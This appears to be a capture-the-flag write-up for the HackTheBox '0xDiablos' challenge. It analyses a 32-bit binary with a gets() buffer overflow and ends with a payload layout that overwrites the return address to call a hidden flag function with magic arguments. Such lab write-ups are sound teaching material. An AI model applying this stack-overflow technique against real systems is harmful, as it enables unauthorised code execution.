0xDiablos — HackTheBox

Description

A classic binary exploitation challenge where you are given a 32-bit ELF binary called "vuln" and a remote target to exploit. The binary has a buffer overflow vulnerability that must be exploited to call a hidden flag-printing function with the correct magic parameters.

Binary Analysis

File: ELF 32-bit, dynamically linked, not stripped

Security:

• No PIE (base 0x8048000 — fixed addresses)
• No stack canary
• NX disabled (executable stack)
• Partial RELRO
• RWX segments present

Key functions (via objdump):

• vuln() at 0x08049272 — contains gets() call (buffer overflow)
• flag() at 0x080491e2 — reads and prints flag.txt, but requires correct parameters

Vulnerability

1. vuln() allocates a buffer at ebp - 0xb8 (184 bytes)
2. Calls gets() on this buffer — unbounded read, classic stack buffer overflow
3. No stack canary to prevent overwrite

flag(param1, param2) function logic:

1. Opens "flag.txt" with fopen()
2. Reads contents with fgets() (64 bytes)
3. Checks if param1 == 0xdeadbeef AND param2 == 0xc0ded00d
4. Only if BOTH checks pass, calls printf() to print the flag
5. If either check fails, returns silently without printing

Buffer overflow math:

• Buffer size: 184 bytes (ebp - 0xb8)
• Saved EBP: 4 bytes
• Offset to EIP (return address): 184 + 4 = 188 bytes

Exploitation Strategy

1. Overflow the buffer in vuln() to overwrite the saved return address (EIP)
2. Redirect execution to flag() function
3. Since this is a 32-bit binary using cdecl calling convention, function arguments are passed on the stack after the return address
4. Place the two magic values (0xdeadbeef, 0xc0ded00d) at the correct stack positions

Payload layout (32-bit cdecl):

[188 bytes padding] [flag() addr] [fake return] [param1] [param2]
     'A' * 188      0x080491e2      'BBBB'     0xdeadbeef 0xc0ded00d

...